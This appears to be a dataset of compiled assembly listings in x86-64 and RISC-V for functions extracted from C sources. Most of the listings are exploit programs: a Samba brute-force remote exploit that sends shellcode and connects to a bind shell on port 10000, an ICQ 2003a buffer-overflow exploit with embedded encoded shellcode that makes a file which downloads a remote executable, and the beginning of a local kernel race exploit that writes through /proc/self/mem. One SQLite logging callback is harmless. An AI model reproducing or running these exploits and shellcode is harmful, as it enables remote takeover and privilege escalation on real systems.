__atk_code_send_recv@PLT movl %ebp, %edi call close@PLT movl $2, %edi call sleep@PLT movl SH_PORT(%rip), %esi movq %r13, %rdi call setsock@PLT xorl %esi, %esi movl %eax, %edi movl %eax, %ebp call re_connt@PLT cmpl $-1, %eax je .L20 movl BRUTE_AT(%rip), %eax subl $1, %eax cmpl %eax, %r15d jge .L21 .p2align 4,,10 .p2align 3 .L22: movl stdout(%rip), %edi movq %rbx, %rsi xorl %eax, %eax addl $1, %r15d call fprintf@PLT movl BRUTE_AT(%rip), %eax subl $1, %eax cmpl %r15d, %eax jg .L22 .L21: movl stdout(%rip), %edi movq %r14, %rsi xorl %eax, %eax call fprintf@PLT movl stdout(%rip), %edi movl %r12d, %edx xorl %eax, %eax leaq .LC15(%rip), %rsi call fprintf@PLT movl stdout(%rip), %edi leaq .LC16(%rip), %rsi xorl %eax, %eax call fprintf@PLT movl stdout(%rip), %edi leaq .LC17(%rip), %rsi xorl %eax, %eax call fprintf@PLT movl stdout(%rip), %edi leaq .LC18(%rip), %rsi xorl %eax, %eax call fprintf@PLT movl %ebp, %edi call send_recv_sh@PLT .L20: addl $1, %r15d cmpl %r15d, BRUTE_AT(%rip) jg .L15 .L23: movl stdout(%rip), %edi leaq .LC7(%rip), %rsi xorl %eax, %eax call fprintf@PLT movl stdout(%rip), %edi leaq .LC8(%rip), %rsi xorl %eax, %eax call fprintf@PLT movl BRUTE_AT(%rip), %edx movl stdout(%rip), %edi xorl %eax, %eax leaq .LC9(%rip), %rsi call fprintf@PLT movl stdout(%rip), %edi leaq .LC10(%rip), %rsi xorl %eax, %eax call fprintf@PLT movl stdout(%rip), %edi leaq .LC11(%rip), %rsi xorl %eax, %eax call fprintf@PLT orl $-1, %edi call exit@PLT jmp .L16 .L14: movslq 8(%rsp), %rax leaq .LC19(%rip), %rsi leaq 16(%rsp), %r13 salq $4, %rax addq plat(%rip), %rax movq 8(%rax), %rdx xorl %eax, %eax call fprintf@PLT movl stdout(%rip), %edi leaq .LC20(%rip), %rsi xorl %eax, %eax call fprintf@PLT movl ATK_PORT(%rip), %esi movq %r13, %rdi call setsock@PLT movl $1, %esi movl %eax, %edi movl %eax, %ebp call re_connt@PLT movl stdout(%rip), %edi leaq .LC21(%rip), %rsi xorl %eax, %eax call fprintf@PLT movl %r12d, %esi movl %ebp, %edi call __atk_code_send_recv@PLT movl %ebp, %edi call close@PLT movl SH_PORT(%rip), %ecx movq %r13, %rdx xorl %eax, %eax movl stdout(%rip), %edi leaq .LC22(%rip), %rsi call fprintf@PLT movl $2, %edi call sleep@PLT movl SH_PORT(%rip), %esi movq %r13, %rdi call setsock@PLT movl $1, %esi movl %eax, %edi movl %eax, %ebp call re_connt@PLT movl stdout(%rip), %edi movq %r13, %rdx xorl %eax, %eax movl SH_PORT(%rip), %ecx leaq .LC23(%rip), %rsi call fprintf@PLT movl %ebp, %edi call send_recv_sh@PLT .L16: movq 152(%rsp), %rax subq %fs:40, %rax jne .L34 addq $168, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L19: .cfi_restore_state movl stdout(%rip), %edi movq %rbx, %rsi xorl %eax, %eax addl $1, %r15d call fprintf@PLT .L30: movl BRUTE_AT(%rip), %eax subl $1, %eax cmpl %r15d, %eax jg .L19 movl stdout(%rip), %edi movq %r14, %rsi xorl %eax, %eax call fprintf@PLT movl stderr(%rip), %edi leaq .LC14(%rip), %rsi xorl %eax, %eax call fprintf@PLT orl $-1, %edi call exit@PLT jmp .L17 .L32: movq (%rbx), %rdi call usage@PLT jmp .L2 .L34: call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size main, .-main .globl stdout .bss .align 4 .type stdout, @object .size stdout, 4 stdout: .zero 4 .globl stderr .align 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .globl plat .align 8 .type plat, @object .size plat, 8 plat: .zero 8 .globl SH_PORT .align 4 .type SH_PORT, @object .size SH_PORT, 4 SH_PORT: .zero 4 .globl BRUTE_AT .align 4 .type BRUTE_AT, @object .size BRUTE_AT, 4 BRUTE_AT: .zero 4 .globl ATK_PORT .align 4 .type ATK_PORT, @object .size ATK_PORT, 4 ATK_PORT: .zero 4 .globl g_aug_volatile_3012 .data .align 4 .type g_aug_volatile_3012, @object .size g_aug_volatile_3012, 4 g_aug_volatile_3012: .long 8 .section .rodata.cst16,"aM",@progbits,16 .align 16 .LC24: .quad 8317981851476258668 .quad 116 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_22468.c_main_aug_v3_1.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC1: .string " Try `%s -i' for more information.\n\n" .align 3 .LC2: .string "H:h:S:s:T:t:IiB:b" .align 3 .LC3: .string " **\n ** OK, It's good selection, Attack tries %d times.\n" .align 3 .LC4: .string " ** If work process is boring, drink coffee and wait. hehe ;-D\n **\n\n" .align 3 .LC5: .string " [*] Brute-Force mode:\n\n" .align 3 .LC6: .string " |----+----+----+----+----+----+----+----+----+----+----+----+----|" .align 3 .LC7: .string "\n |" .align 3 .LC8: .string "|\n\n **\n" .align 3 .LC9: .string " ** Brute-Force exploit failed. Reason is simple.\n **\n" .align 3 .LC10: .string " ** Could not search shellcode's position during %d times.\n" .align 3 .LC11: .string " ** Or, Operating System's target that we attack isn't.\n" .align 3 .LC12: .string " ** OOops ! is server Samba version doubtful ??\n **\n\n" .align 3 .LC13: .string "=" .align 3 .LC14: .string "|\n\n" .align 3 .LC15: .string " [-] Connect Failed.\n\n" .align 3 .LC16: .string " [+] Shellcode address: %p\n" .align 3 .LC17: .string " [*] Brute-Force end !!\n\n" .align 3 .LC18: .string " **\n ** Bind shellcode is port 10000.\n" .align 3 .LC19: .string " ** If bindshell port number was changed, change connection port.\n **\n\n" .align 3 .LC20: .string " [0] Target: %s\n" .align 3 .LC21: .string " [1] Set socket.\n" .align 3 .LC22: .string " [2] Make shellcode & Send Packet.\n" .align 3 .LC23: .string " [3] Trying %s:%d.\n" .align 3 .LC24: .string " [*] Connected to %s:%d.\n" .align 3 .LC0: .string "localhost" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-256 lla a5,.LC0 la a3,__stack_chk_guard lbu t0,0(a5) lbu t6,1(a5) lbu t5,2(a5) lbu t4,3(a5) lbu t3,4(a5) ld a4, 0(a3) sd a4, 136(sp) li a4, 0 lbu a7,6(a5) lbu a6,7(a5) lbu a3,8(a5) lbu a4,9(a5) lbu t1,5(a5) lw a5,.LANCHOR0 addiw a5,a5,1 sd ra,248(sp) sw a5,.LANCHOR0,t2 sb t0,0(sp) sb t6,1(sp) sb t5,2(sp) sb t4,3(sp) sb t3,4(sp) sd s0,240(sp) sd s1,232(sp) sd s2,224(sp) sd s3,216(sp) li a2,120 sd s4,208(sp) sd s5,200(sp) sd s6,192(sp) sd s7,184(sp) sd s8,176(sp) sd s9,168(sp) sd s10,160(sp) sd s11,152(sp) mv s3,a0 mv s2,a1 addi a0,sp,10 li a1,0 sb t1,5(sp) lla s0,.LANCHOR1 sb a7,6(sp) sb a6,7(sp) sb a3,8(sp) sb a4,9(sp) call memset@plt ld a5,0(s0) lw s1,0(a5) call banrl@plt li a5,1 ble s3,a5,.L34 .L2: li s10,0 li s8,0 lla s6,.LC2 li s5,-1 li s7,53 lla s4,.L6 la s9,optarg mv s11,sp .L3: mv a2,s6 mv a1,s2 mv a0,s3 call getopt@plt beq a0,s5,.L35 .L13: addiw a0,a0,-63 sext.w a5,a0 bgtu a5,s7,.L3 slli a5,a0,32 srli a0,a5,30 add a0,a0,s4 lw a5,0(a0) add a5,a5,s4 jr a5 .section .rodata .align 2 .align 2 .L6: .word .L11-.L6 .word .L3-.L6 .word .L3-.L6 .word .L10-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L9-.L6 .word .L8-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L7-.L6 .word .L5-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L10-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L9-.L6 .word .L8-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L3-.L6 .word .L7-.L6 .word .L5-.L6 .section .text.startup .L8: ld a0,0(s2) call usage@plt mv a2,s6 mv a1,s2 mv a0,s3 call getopt@plt bne a0,s5,.L13 .L35: lw a0,12(s0) beq s10,zero,.L14 lw a2,16(s0) lla a1,.LC3 li s11,0 call fprintf@plt lw a0,12(s0) lla a1,.LC4 mv s4,sp call fprintf@plt lw a0,12(s0) lla a1,.LC5 call fprintf@plt lw a0,12(s0) lla a1,.LC6 call fprintf@plt lw a0,12(s0) lla a1,.LC7 call fprintf@plt lw a4,16(s0) ble a4,zero,.L23 lla s2,.LC13 li s5,-1 lla s6,.LC14 lla s10,.LC16 lla s9,.LC17 lla s8,.LC18 lla s7,.LC19 .L15: lw a0,12(s0) addiw s1,s1,256 call fflush@plt lw a0,12(s0) mv a1,s2 call fprintf@plt lw a1,20(s0) mv a0,s4 call setsock@plt sext.w s3,a0 li a1,0 mv a0,s3 call re_connt@plt sext.w a0,a0 beq a0,s5,.L31 .L17: mv a1,s1 mv a0,s3 call __atk_code_send_recv@plt mv a0,s3 call close@plt li a0,2 call sleep@plt lw a1,24(s0) mv a0,s4 call setsock@plt sext.w s3,a0 li a1,0 mv a0,s3 call re_connt@plt sext.w a0,a0 bne a0,s5,.L32 j .L20 .L22: mv a1,s2 addiw s11,s11,1 call fprintf@plt .L32: lw a4,16(s0) lw a0,12(s0) addiw a4,a4,-1 bgt a4,s11,.L22 mv a1,s6 call fprintf@plt lw a0,12(s0) mv a2,s1 mv a1,s10 call fprintf@plt lw a0,12(s0) mv a1,s9 call fprintf@plt lw a0,12(s0) mv a1,s8 call fprintf@plt lw a0,12(s0) mv a1,s7 call fprintf@plt mv a0,s3 call send_recv_sh@plt .L20: lw a4,16(s0) addiw s11,s11,1 bgt a4,s11,.L15 .L23: lw a0,12(s0) lla a1,.LC8 call fprintf@plt lw a0,12(s0) lla a1,.LC9 call fprintf@plt lw a2,16(s0) lw a0,12(s0) lla a1,.LC10 call fprintf@plt lw a0,12(s0) lla a1,.LC11 call fprintf@plt lw a0,12(s0) lla a1,.LC12 call fprintf@plt li a0,-1 call exit@plt j .L16 .L9: li a2,130 li a1,0 mv a0,s11 call memset@plt ld a1,0(s9) li a2,129 mv a0,s11 call strncpy@plt j .L3 .L10: addiw s10,s10,1 j .L3 .L5: ld a0,0(s9) call atoi@plt li a5,1 mv s8,a0 bgt a0,a5,.L8 ld a5,0(s0) slli a4,a0,4 add a5,a5,a4 lw s1,0(a5) j .L3 .L7: ld a0,0(s9) li a2,0 li a1,0 call strtoul@plt mv s1,a0 j .L3 .L11: ld a2,0(s2) lw a0,8(s0) lla a1,.LC1 call fprintf@plt li a0,-1 call exit@plt j .L3 .L14: ld a5,0(s0) slli s8,s8,4 lla a1,.LC20 add a5,a5,s8 ld a2,8(a5) mv s2,sp call fprintf@plt lw a0,12(s0) lla a1,.LC21 call fprintf@plt lw a1,20(s0) mv a0,s2 call setsock@plt sext.w s3,a0 li a1,1 mv a0,s3 call re_connt@plt lw a0,12(s0) lla a1,.LC22 call fprintf@plt mv a1,s1 mv a0,s3 call __atk_code_send_recv@plt mv a0,s3 call close@plt lw a3,24(s0) lw a0,12(s0) mv a2,s2 lla a1,.LC23 call fprintf@plt li a0,2 call sleep@plt lw a1,24(s0) mv a0,s2 call setsock@plt sext.w s1,a0 li a1,1 mv a0,s1 call re_connt@plt lw a3,24(s0) lw a0,12(s0) mv a2,s2 lla a1,.LC24 call fprintf@plt mv a0,s1 call send_recv_sh@plt .L16: la a5,__stack_chk_guard ld a4, 136(sp) ld a5, 0(a5) xor a5, a4, a5 li a4, 0 bne a5,zero,.L36 ld ra,248(sp) ld s0,240(sp) ld s1,232(sp) ld s2,224(sp) ld s3,216(sp) ld s4,208(sp) ld s5,200(sp) ld s6,192(sp) ld s7,184(sp) ld s8,176(sp) ld s9,168(sp) ld s10,160(sp) ld s11,152(sp) li a0,0 addi sp,sp,256 jr ra .L19: mv a1,s2 addiw s11,s11,1 call fprintf@plt .L31: lw a4,16(s0) lw a0,12(s0) addiw a4,a4,-1 bgt a4,s11,.L19 mv a1,s6 call fprintf@plt lw a0,8(s0) lla a1,.LC15 call fprintf@plt li a0,-1 call exit@plt j .L17 .L34: ld a0,0(s2) call usage@plt j .L2 .L36: call __stack_chk_fail@plt .size main, .-main .globl stdout .globl stderr .globl plat .globl SH_PORT .globl BRUTE_AT .globl ATK_PORT .globl g_aug_volatile_3012 .data .align 2 .set .LANCHOR0,. + 0 .type g_aug_volatile_3012, @object .size g_aug_volatile_3012, 4 g_aug_volatile_3012: .word 8 .bss .align 3 .set .LANCHOR1,. + 0 .type plat, @object .size plat, 8 plat: .zero 8 .type stderr, @object .size stderr, 4 stderr: .zero 4 .type stdout, @object .size stdout, 4 stdout: .zero 4 .type BRUTE_AT, @object .size BRUTE_AT, 4 BRUTE_AT: .zero 4 .type ATK_PORT, @object .size ATK_PORT, 4 ATK_PORT: .zero 4 .type SH_PORT, @object .size SH_PORT, 4 SH_PORT: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_mptest.c_sqlTraceCallback_aug_v3_7
.file "extr_mptest.c_sqlTraceCallback_aug_v3_7.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "[%.*s]" .text .p2align 4 .type sqlTraceCallback, @function sqlTraceCallback: .LFB1: .cfi_startproc endbr64 pushq %r12 .cfi_def_cfa_offset 16 .cfi_offset 12, -16 movq %rsi, %r12 call UNUSED_PARAMETER@PLT movq %r12, %rdi call clipLength@PLT movq %r12, %rdx leaq .LC0(%rip), %rdi popq %r12 .cfi_def_cfa_offset 8 movl %eax, %esi jmp logMessage@PLT .cfi_endproc .LFE1: .size sqlTraceCallback, .-sqlTraceCallback .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_mptest.c_sqlTraceCallback_aug_v3_7.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "[%.*s]" .text .align 1 .type sqlTraceCallback, @function sqlTraceCallback: addi sp,sp,-16 sd ra,8(sp) sd s0,0(sp) mv s0,a1 call UNUSED_PARAMETER@plt mv a0,s0 call clipLength@plt mv a2,s0 ld s0,0(sp) ld ra,8(sp) mv a1,a0 lla a0,.LC0 addi sp,sp,16 tail logMessage@plt .size sqlTraceCallback, .-sqlTraceCallback .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_1277.c_main_aug_v3_7
.file "extr_1277.c_main_aug_v3_7.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "\n\n\tMirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit\n" .align 8 .LC1: .string "\tBug discovered & exploit coded by ATmaCA\n" .align 8 .LC2: .string "\tWeb: http://www.spyinstructors.com && http://www.atmacasoft.com\n" .section .rodata.str1.1,"aMS",@progbits,1 .LC3: .string "\tE-Mail: [email protected]\n" .section .rodata.str1.8 .align 8 .LC4: .string "\tCredit to Kozan and delicon\n\n" .section .rodata.str1.1 .LC5: .string "Usage:\n" .LC6: .string " icq_bof <WebUrl>\n" .section .rodata.str1.8 .align 8 .LC7: .string " Example:icq_bof http://www.atmacasoft.com/small.exe\n" .section .rodata.str1.1 .LC9: .string "\"\377" .LC10: .string "\035" .LC11: .string "w+" .LC12: .string "bof.txt" .LC13: .string "%s" .section .rodata.str1.8 .align 8 .LC14: .string "\r\nbof.txt has been generated!\r\n" .align 8 .LC8: .string "\353\020X1\311f\201\351\"\377\2000\035@\342\372\353\005\350\353\377\377\377\364\321\035\035\035B\365K\035\035\035\224\336Mu\223S\023\361\365}\035\035\035,\324{\244rsLuhoqpI\342\315Mu+\0072m\365[\035\035\035,\324LL\220*K\220j\025KL\342\315Nu\205\343\227\023\3650\035\035\035LJ\342\315,\324T\377\343Nuc\305\377n\365\004\035\035\035\342\315HKy\274-\035\035\035\226]\021\226m\001\260\226u\025\224\365C@\336NHKJ\226q9\005\226X!\226I\030e\034\367\226W\005\226G=\034\366\376(T\226)\226\034\363,\342\341,\335\261%\375i\032\334\322\020\034\332\366\357&a9\th\374\226G9\034\366{\226\021V\226G\001\034\366\226\031\226\034\365\364\037\035\035\035,\335\224\367BC@F\336\3652\342\342\342puu3xex\035" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB1: .cfi_startproc endbr64 pushq %r13 .cfi_def_cfa_offset 16 .cfi_offset 13, -16 pushq %r12 .cfi_def_cfa_offset 24 .cfi_offset 12, -24 pushq %rbp .cfi_def_cfa_offset 32 .cfi_offset 6, -32 subq $768, %rsp .cfi_def_cfa_offset 800 movq %fs:40, %rax movq %rax, 760(%rsp) movl g_aug_volatile_7864(%rip), %eax addl $1, %eax movl %eax, g_aug_volatile_7864(%rip) cmpl $2, %edi jle .L12 movq %rsi, %rdx leaq 16(%rsp), %r13 leaq 16(%rsp), %rdi movl $246, %ecx movq 8(%rdx), %r12 leaq .LC8(%rip), %rsi movw $-222, 14(%rsp) rep movsb leaq .LC9(%rip), %rsi movq %r13, %rdi call strstr@PLT movq %r12, %rdi movq %rax, %rbp call strlen@PLT movl $2, %edx leaq 14(%rsp), %rsi movq %rbp, %rdi addl $1, %eax subw %ax, 14(%rsp) xorl %eax, %eax call memcpy@PLT movq %r12, %rdi call strlen@PLT leal 247(%rax), %edi call malloc@PLT movq %r13, %rsi movq %rax, %rdi movq %rax, %rbp call strcpy@PLT movq %r12, %rdi call Sifrele@PLT movq %rbp, %rdi movq %rax, %rsi call strcat@PLT leaq .LC10(%rip), %rsi movq %rbp, %rdi call strcat@PLT leaq .LC11(%rip), %rsi leaq .LC12(%rip), %rdi call fopen@PLT movq %rax, %r12 testq %rax, %rax je .L1 leaq 272(%rsp), %r13 movl $480, %edx movl $144, %esi movq %r13, %rdi call memset@PLT movq %rbp, %rdi movl $302144604, 306(%rsp) call strlen@PLT leaq 338(%rsp), %rdi movq %rbp, %rsi movl %eax, %edx xorl %eax, %eax call memcpy@PLT movq %r13, %rdx leaq .LC13(%rip), %rsi movq %r12, %rdi movl $0, 752(%rsp) call fprintf@PLT movq %r12, %rdi call fclose@PLT leaq .LC14(%rip), %rdi call printf@PLT .L1: movq 760(%rsp), %rax subq %fs:40, %rax jne .L10 addq $768, %rsp .cfi_remember_state .cfi_def_cfa_offset 32 popq %rbp .cfi_def_cfa_offset 24 popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 ret .L12: .cfi_restore_state leaq .LC0(%rip), %rdi call printf@PLT leaq .LC1(%rip), %rdi call printf@PLT leaq .LC2(%rip), %rdi call printf@PLT leaq .LC3(%rip), %rdi call printf@PLT leaq .LC4(%rip), %rdi call printf@PLT leaq .LC5(%rip), %rdi call printf@PLT leaq .LC6(%rip), %rdi call printf@PLT movq 760(%rsp), %rax subq %fs:40, %rax jne .L10 addq $768, %rsp .cfi_remember_state .cfi_def_cfa_offset 32 leaq .LC7(%rip), %rdi popq %rbp .cfi_def_cfa_offset 24 popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 jmp printf@PLT .L10: .cfi_restore_state call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size main, .-main .globl g_aug_volatile_7864 .data .align 4 .type g_aug_volatile_7864, @object .size g_aug_volatile_7864, 4 g_aug_volatile_7864: .long 2 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_1277.c_main_aug_v3_7.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "\n\n\tMirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit\n" .align 3 .LC1: .string "\tBug discovered & exploit coded by ATmaCA\n" .align 3 .LC2: .string "\tWeb: http://www.spyinstructors.com && http://www.atmacasoft.com\n" .align 3 .LC3: .string "\tE-Mail: [email protected]\n" .align 3 .LC4: .string "\tCredit to Kozan and delicon\n\n" .align 3 .LC5: .string "Usage:\n" .align 3 .LC6: .string " icq_bof <WebUrl>\n" .align 3 .LC7: .string " Example:icq_bof http://www.atmacasoft.com/small.exe\n" .align 3 .LC9: .string "\"\377" .align 3 .LC10: .string "\035" .align 3 .LC11: .string "w+" .align 3 .LC12: .string "bof.txt" .align 3 .LC13: .string "%s" .align 3 .LC14: .string "\r\nbof.txt has been generated!\r\n" .align 3 .LC8: .string "\353\020X1\311f\201\351\"\377\2000\035@\342\372\353\005\350\353\377\377\377\364\321\035\035\035B\365K\035\035\035\224\336Mu\223S\023\361\365}\035\035\035,\324{\244rsLuhoqpI\342\315Mu+\0072m\365[\035\035\035,\324LL\220*K\220j\025KL\342\315Nu\205\343\227\023\3650\035\035\035LJ\342\315,\324T\377\343Nuc\305\377n\365\004\035\035\035\342\315HKy\274-\035\035\035\226]\021\226m\001\260\226u\025\224\365C@\336NHKJ\226q9\005\226X!\226I\030e\034\367\226W\005\226G=\034\366\376(T\226)\226\034\363,\342\341,\335\261%\375i\032\334\322\020\034\332\366\357&a9\th\374\226G9\034\366{\226\021V\226G\001\034\366\226\031\226\034\365\364\037\035\035\035,\335\224\367BC@F\336\3652\342\342\342puu3xex\035" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-800 sd s2,768(sp) la s2,__stack_chk_guard ld a5, 0(s2) sd a5, 744(sp) li a5, 0 lw a5,.LANCHOR0 addiw a5,a5,1 sw a5,.LANCHOR0,a4 sd ra,792(sp) sd s0,784(sp) sd s1,776(sp) sd s3,760(sp) li a5,2 ble a0,a5,.L14 addi s3,sp,8 lla a5,.LC8 mv a4,s3 lla t1,.LC8+240 .L4: ld a7,0(a5) ld a6,8(a5) ld a0,16(a5) ld a2,24(a5) ld a3,32(a5) sd a7,0(a4) sd a6,8(a4) sd a0,16(a4) sd a2,24(a4) sd a3,32(a4) addi a5,a5,40 addi a4,a4,40 bne a5,t1,.L4 lw a3,0(a5) lhu a5,4(a5) ld s1,8(a1) mv a0,s3 sh a5,4(a4) sw a3,0(a4) li a5,-222 lla a1,.LC9 sh a5,6(sp) call strstr@plt mv s0,a0 mv a0,s1 call strlen@plt lhu a5,6(sp) addiw a0,a0,1 li a2,2 subw a5,a5,a0 addi a1,sp,6 mv a0,s0 sh a5,6(sp) call memcpy@plt mv a0,s1 call strlen@plt addiw a0,a0,247 call malloc@plt mv a1,s3 mv s0,a0 call strcpy@plt mv a0,s1 call Sifrele@plt mv a1,a0 mv a0,s0 call strcat@plt lla a1,.LC10 mv a0,s0 call strcat@plt lla a1,.LC11 lla a0,.LC12 call fopen@plt mv s1,a0 beq a0,zero,.L1 addi s3,sp,256 li a2,480 li a1,144 mv a0,s3 call memset@plt li a5,24576 addi a5,a5,-932 sh a5,290(sp) li a5,4096 addi a5,a5,514 mv a0,s0 sh a5,292(sp) call strlen@plt mv a2,a0 mv a1,s0 addi a0,sp,322 call memcpy@plt mv a2,s3 lla a1,.LC13 mv a0,s1 sw zero,736(sp) call fprintf@plt mv a0,s1 call fclose@plt lla a0,.LC14 call printf@plt .L1: ld a4, 744(sp) ld a5, 0(s2) xor a5, a4, a5 li a4, 0 bne a5,zero,.L12 ld ra,792(sp) ld s0,784(sp) ld s1,776(sp) ld s2,768(sp) ld s3,760(sp) addi sp,sp,800 jr ra .L14: lla a0,.LC0 call printf@plt lla a0,.LC1 call printf@plt lla a0,.LC2 call printf@plt lla a0,.LC3 call printf@plt lla a0,.LC4 call printf@plt lla a0,.LC5 call printf@plt lla a0,.LC6 call printf@plt ld a4, 744(sp) ld a5, 0(s2) xor a5, a4, a5 li a4, 0 bne a5,zero,.L12 ld s0,784(sp) ld ra,792(sp) ld s1,776(sp) ld s2,768(sp) ld s3,760(sp) lla a0,.LC7 addi sp,sp,800 tail printf@plt .L12: call __stack_chk_fail@plt .size main, .-main .globl g_aug_volatile_7864 .data .align 2 .set .LANCHOR0,. + 0 .type g_aug_volatile_7864, @object .size g_aug_volatile_7864, 4 g_aug_volatile_7864: .word 2 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_43199.c_main_aug_v3_3
.file "extr_43199.c_main_aug_v3_3.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "[!] mmap()" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC1: .string "[!] Didn't get desired base address for the vulnerable mapping.\n" .align 8 .LC2: .string "[*] The beginning of the zero huge page: %lx\n" .align 8 .LC3: .string "[!] Didn't get desired base address for the check mapping.\n" .section .rodata.str1.1 .LC4: .string "[!] madvise()" .LC5: .string "[!] malloc()" .LC6: .string "/proc/self/mem" .LC7: .string "[!] open()" .section .rodata.str1.8 .align 8 .LC8: .string "[*] Racing. Gonna take a while..." .section .rodata.str1.1 .LC9: .string "[!] pthread_create()" .LC10: .string "[*] Done 0x%lx bytes\n" .LC11: .string "[*] Success!" .LC12: .string "[!] Exploit failed.\n" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 pushq %r13 .cfi_def_cfa_offset 16 .cfi_offset 13, -16 xorl %r9d, %r9d movl $-1, %r8d pushq %r12 .cfi_def_cfa_offset 24 .cfi_offset 12, -24 pushq %rbx .cfi_def_cfa_offset 32 .cfi_offset 3, -32 subq $80, %rsp .cfi_def_cfa_offset 112 movl PROT_READ(%rip), %edx movl MAP_SIZE(%rip), %esi movq %fs:40, %rax movq %rax, 72(%rsp) movl g_aug_volatile_9387(%rip), %eax movq MAP_BASE(%rip), %rdi movl MAP_PRIVATE(%rip), %ecx orl MAP_ANONYMOUS(%rip), %ecx addl $1, %eax movl %eax, g_aug_volatile_9387(%rip) call mmap@PLT cmpq MAP_FAILED(%rip), %rax movq %rax, (%rsp) je .L25 cmpq MAP_BASE(%rip), %rax je .L4 movl stderr(%rip), %edi leaq .LC1(%rip), %rsi call fprintf@PLT .L5: movl MAP_SIZE(%rip), %esi movq (%rsp), %rdi call munmap@PLT testl %r12d, %r12d jne .L26 .L1: movq 72(%rsp), %rax subq %fs:40, %rax jne .L27 addq $80, %rsp .cfi_remember_state .cfi_def_cfa_offset 32 movl %r12d, %eax popq %rbx .cfi_def_cfa_offset 24 popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 ret .L4: .cfi_restore_state movq (%rax), %rsi leaq .LC2(%rip), %rdi xorl %eax, %eax call printf@PLT movl MAP_SIZE(%rip), %esi xorl %r9d, %r9d orl $-1, %r8d movl PROT_READ(%rip), %edx movl MAP_PRIVATE(%rip), %ecx leal (%rsi,%rsi), %ebx orl MAP_ANONYMOUS(%rip), %ecx movslq %ebx, %rbx addq MAP_BASE(%rip), %rbx movq %rbx, %rdi call mmap@PLT cmpq MAP_FAILED(%rip), %rax movq %rax, 8(%rsp) je .L28 cmpq %rbx, %rax je .L7 movl stderr(%rip), %edi leaq .LC3(%rip), %rsi call fprintf@PLT .L8: movl MAP_SIZE(%rip), %esi movq 8(%rsp), %rdi call munmap@PLT jmp .L5 .L26: movl stderr(%rip), %edi leaq .LC12(%rip), %rsi call fprintf@PLT jmp .L1 .L7: movl MADV_HUGEPAGE(%rip), %edx movl MAP_SIZE(%rip), %esi movq (%rsp), %rdi call madvise@PLT movl MADV_HUGEPAGE(%rip), %edx movl MAP_SIZE(%rip), %esi movq 8(%rsp), %rdi movl %eax, %ebx call madvise@PLT orl %eax, %ebx jne .L29 movq PAGE_SIZE(%rip), %rdi call malloc@PLT movl %eax, 36(%rsp) movl %eax, %r12d testl %eax, %eax je .L30 movq PAGE_SIZE(%rip), %rdx movl MEMESET_VAL(%rip), %esi movl %eax, %edi leaq .LC6(%rip), %r12 call memset@PLT movl O_RDWR(%rip), %esi movq %r12, %rdi call open@PLT movq %rax, 16(%rsp) testq %rax, %rax js .L31 movl O_RDWR(%rip), %esi movq %r12, 